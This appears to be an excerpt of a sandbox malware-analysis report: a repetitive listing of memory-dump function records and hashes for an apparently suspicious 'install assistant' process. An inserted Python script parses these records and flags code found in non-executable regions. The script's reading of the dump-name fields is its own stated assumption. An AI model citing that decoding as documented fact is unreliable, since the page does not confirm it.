                                                                                                                • Instruction Fuzzy Hash: 9F029D326083608BD724CF29C49079EBBE2AFD8718F184A2EF4D597B51C778D985CB42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                                                                                                • Instruction ID: 2b61c48be0e7b5415e42b9d191e9b2d033c2109a442f9ce9c4f24402c4ecad89
                                                                                                                • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                                                                                                • Instruction Fuzzy Hash: 04D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (SL
                                                                                                                • API String ID: 0-669240678
                                                                                                                • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                                                                                                • Instruction ID: 9403e94d6e0880428767cb10dc4bfe20aab94b562d05ffd900d3b265ca1dfb35
                                                                                                                • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                                                                                                • Instruction Fuzzy Hash: CF516473E208314AD78CCE24DC2177672D2E784310F8BC1B99D8BAB6E6DD78989587D4
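The two records above are typical of the whole function listing: each names the memory dump the disassembly came from, the dumps of the neighbouring regions, and a set of IDs and fuzzy hashes for similarity lookups. What follows is an added example, not Joe Sandbox code, that parses records of this shape into structured data, decodes the dump file names, strips the "Download File" link label the rendered page fuses onto the associated dumps, de-duplicates functions by Opcode ID, and flags functions whose code was dumped from a region not mapped executable. The field layout of the .sdmp name (PID.stage.sequence.base.protect.flag.type.index) is an assumption inferred from the names on this page: the PID, stage and base fields agree with the page's own Snapshot File name (hcaresult_12_2_...) and Offset field, the protect and type fields are read as winnt.h constants because their values (0x08, 0x04, 0x20; 0x01000000) match PAGE_WRITECOPY, PAGE_READWRITE, PAGE_EXECUTE_READ and MEM_IMAGE exactly, and the two remaining fields are left raw since the page does not document them. The sample input is the two records above, copied from the page.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# winnt.h memory protection and region type constants (exact documented values).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED .sdmp name layout, inferred from the names on this page:
# PID.stage.sequence.base.protect.flag.type.index. PID, stage and base agree with the
# page's Snapshot File name and Offset field; protect/type are read as winnt.h values;
# flag and index are kept raw because the page does not say what they mean.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})\.(?P<memtype>[0-9A-Fa-f]{8})\."
    r"(?P<index>[0-9A-Fa-f]{8})\.sdmp$")

@dataclass
class DumpRegion:
    pid: int
    stage: int
    base: int
    protect: str
    mem_type: str

    @property
    def executable(self) -> bool:
        return self.protect.startswith("PAGE_EXECUTE")  # PAGE_EXECUTE* are 0x10..0x80

def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    prot = int(m["protect"], 16) & 0xFF  # mask PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE
    mtype = int(m["memtype"], 16)
    return DumpRegion(int(m["pid"], 16), int(m["stage"], 16), int(m["base"], 16),
                      PAGE_PROTECT.get(prot, f"0x{prot:02x}"), MEM_TYPE.get(mtype, f"0x{mtype:x}"))

@dataclass
class FunctionRecord:
    source: Optional[DumpRegion] = None
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Opcode ID, Instruction Fuzzy Hash, ...

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*?)\s*$")

def parse_records(text: str) -> list:
    """One FunctionRecord per 'Memory Dump Source' block of the report's function listing."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if cur is None or not m:
            continue
        key, val = m["key"], m["val"]
        if key == "Source File":
            cur.source = parse_sdmp_name(val.split(",")[0])
        elif key == "Associated":  # the rendered page fuses the 'Download File' link label onto the name
            cur.associated.append(parse_sdmp_name(val.removesuffix("Download File")))
        else:
            cur.fields[key] = val
    return records

def unique_by_opcode(records: list) -> list:
    """Drop records that repeat an Opcode ID already seen (same function listed more than once)."""
    seen, out = set(), []
    for r in records:
        oid = r.fields.get("Opcode ID")
        if oid and oid not in seen:
            seen.add(oid)
            out.append(r)
    return out

def code_in_non_executable_regions(records: list) -> list:
    """Functions disassembled from a region whose dump name does not carry an executable
    protection; code found in a writable section was not loaded as the PE's .text."""
    return [r for r in records if r.source is not None and not r.source.executable]

# Constructed sample: the two records directly above this example, copied from the page
# (second record abbreviated to its ID fields).
SAMPLE = """\
Memory Dump Source
• Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
• Instruction ID: 2b61c48be0e7b5415e42b9d191e9b2d033c2109a442f9ce9c4f24402c4ecad89
• Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
• Instruction Fuzzy Hash: 04D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
Memory Dump Source
• Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
• String ID: (SL
• Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
• Instruction Fuzzy Hash: CF516473E208314AD78CCE24DC2177672D2E784310F8BC1B99D8BAB6E6DD78989587D4
"""
```

Run `code_in_non_executable_regions(unique_by_opcode(parse_records(SAMPLE)))` on the sample and both records come back: if the fifth name field is the region protection, as assumed, the source dump at 6C9A6000 decodes to PAGE_WRITECOPY (a copy-on-write image data mapping) while the associated dump at 6CA77000 decodes to PAGE_EXECUTE_READ. Code disassembled from a non-executable data mapping of an image is the kind of thing to check by hand in the dump rather than take from the listing alone; the script only surfaces it.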
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                                                                                                • Instruction ID: 9ccb0d09ec4c85dbc2a09b41f7194d80072bfba7790093a83b6d77378528b0f4
                                                                                                                • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                                                                                                • Instruction Fuzzy Hash: BF728D716082128FD748CF2CC590258FBE1FB89314B5A46AED95ADBB42DB31E8D5CBC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                                                                                                • Instruction ID: 41741d71f9da5c37d80a9a06c2e0b039c15116eb74717261bdcda7cc5218aad2
                                                                                                                • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                                                                                                • Instruction Fuzzy Hash: FF524E31608B458BD718CF29C5946AAF7E2BF99308F184A2DD4DAC7F41DB74E885CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                                                                                • Instruction ID: 97c29308fee2b21def3badb758759de158f359d1f3d69ebc38a7cf13709b4e45
                                                                                                                • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                                                                                • Instruction Fuzzy Hash: 3F6202B1A083558FC714CF29C5A051ABBF1BFC8744F289A2EE899D7715DB70E885CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                                                                                                • Instruction ID: bdf6f330a873e94c5c268a2c4fb0392e79904fe544393d7efd49e28d9e80fc8d
                                                                                                                • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                                                                                                • Instruction Fuzzy Hash: AE428031604B158BD328CF69D9907AAB7F2FF84304F045A2DE89AC7B94E774E589CB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                                                                                                • Instruction ID: e9f2a1fda275a072973248c4e8d20f13a7527008c52bc2d359fac34590b0ba50
                                                                                                                • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                                                                                                • Instruction Fuzzy Hash: B712DE702097518FC718CF29C5946AAFBE2BFC8314F5C4A2DE9968BB41D739E885CB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                                • Instruction ID: ac54bbc46905737ad583ab2b9a2d7eb26647a9fc14c8bcef45a37c9ef7b486be
                                                                                                                • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                                • Instruction Fuzzy Hash: CA020A73A0836147D714CE1ECCA4229B7E3FBC0380F5A5B2DE89987785DAB0D986C791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                                                                                • Instruction ID: d1c34b8f538d546ef60cf37a069ed9db6e5f33a53e33a4ab519fbbc4d4dd9d86
                                                                                                                • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                                                                                • Instruction Fuzzy Hash: 86022B31A083218BC319CE1DC4A4259BBF2FBC4345F195B2EE49AD7A95D77498C5CBC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                                                                                                • Instruction ID: d071091f5c3b3d54005ca310e274b2dc2e1d3397bf12f64e07f6bf61681245cc
                                                                                                                • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                                                                                                • Instruction Fuzzy Hash: DD12D1306047618FC324DF2EC4A4666FBF2AF85308F188A6ED5DAC7A91D735E588CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 197aec8a6e2a317b323f6aae5095031827df40ea46c44a9cbc9116775b6008cc
                                                                                                                • Instruction ID: 1ec660d3f6382cf714864c03d224a7c07277ae9e26f20ce2f9908ade48415e2e
                                                                                                                • Opcode Fuzzy Hash: 197aec8a6e2a317b323f6aae5095031827df40ea46c44a9cbc9116775b6008cc
                                                                                                                • Instruction Fuzzy Hash: 2B02A2716087208FC728CF2ED494226FBF2AF85301F148A6EE5DAC7B91D235E955CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                                                                                                • Instruction ID: 2fca2d60f7ed9173633b12ddc188562d070c6c945394975851b89f68fc0ba06d
                                                                                                                • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                                                                                                • Instruction Fuzzy Hash: A2F1B631A082898BEB25CE2CD4507EEBBE2FBC5314F58453DD889CBB41DB35958AC791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                                                                                                • Instruction ID: 248783272354b076d1c9830f896838d8248cc92d91675f10c4ae20a0f4aed8a3
                                                                                                                • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                                                                                                • Instruction Fuzzy Hash: E6E1E131704B114FE724CF29D4503AAF7E2FBC5314F588A2DC59687B81DB79A58ACB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                                                                                                • Instruction ID: d22056a95fd8525d906dbc3e14aa9cca48af42c9d5f7ad0e174ad6bf6851d0db
                                                                                                                • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                                                                                                • Instruction Fuzzy Hash: 81F1B2716087618FC328DF2DD8A0266FBF1AF85308F184A6ED1DAC7A91D339E594CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                                                                                                • Instruction ID: 603c865f5b33f9ca3fd1fecb9f326361e70dfc28b849b3abd24cc0f54c5b9fa1
                                                                                                                • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                                                                                                • Instruction Fuzzy Hash: 24F1D2705087718FC729CF69C4A0266FBF2BF85304F188A2ED4DAC6A81D339E995CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                                                                                                • Instruction ID: b9e688c778210eb4cc418aca3cb69181116532e7fb49df42fb4aff3e87ee9dd2
                                                                                                                • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                                                                                                • Instruction Fuzzy Hash: CDC1C172604B168BE328CF2DC4906AAB7E2FBC4314F588A2DC5A787B45D774F495CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                                                                                                • Instruction ID: 3102cd6b9da9efa7c9a07850e64cd1935dce898991f76fc622b8b1475a32f7d4
                                                                                                                • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                                                                                                • Instruction Fuzzy Hash: 7BE1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B427DDA650B392D734A942DB94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                • Instruction ID: 7720700b3cb559458f058acc548b4d01ce8ea973643f4dc3feb8deb70a616856
                                                                                                                • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                                                • Instruction Fuzzy Hash: 1CD111719046268FD318CF1DC494636BBE1FF86304F0D4ABDEAA68B78AD7389555CB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                                                                                                                • Instruction ID: e5411cdb580a6f33ff41c3d260aa949733b59f6cf39cdbe6740942cbf6bed9e3
                                                                                                                • Opcode Fuzzy Hash: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                                                                                                                • Instruction Fuzzy Hash: D1B171726052218FD340DF2DC8802557BA2BFC522D77D87ADC4A49FA5AD73AE447CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                                                                                • Instruction ID: 58c6bb58ba2a6e9d040f6c2f2cc798fa90b18560bbd385761479e51d10ed53d1
                                                                                                                • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                                                                                • Instruction Fuzzy Hash: C9C1C1352047918BC318CF39D0A06A7BFE2EFDA314F188A6DC4CA4BB55DA74A44ECB55
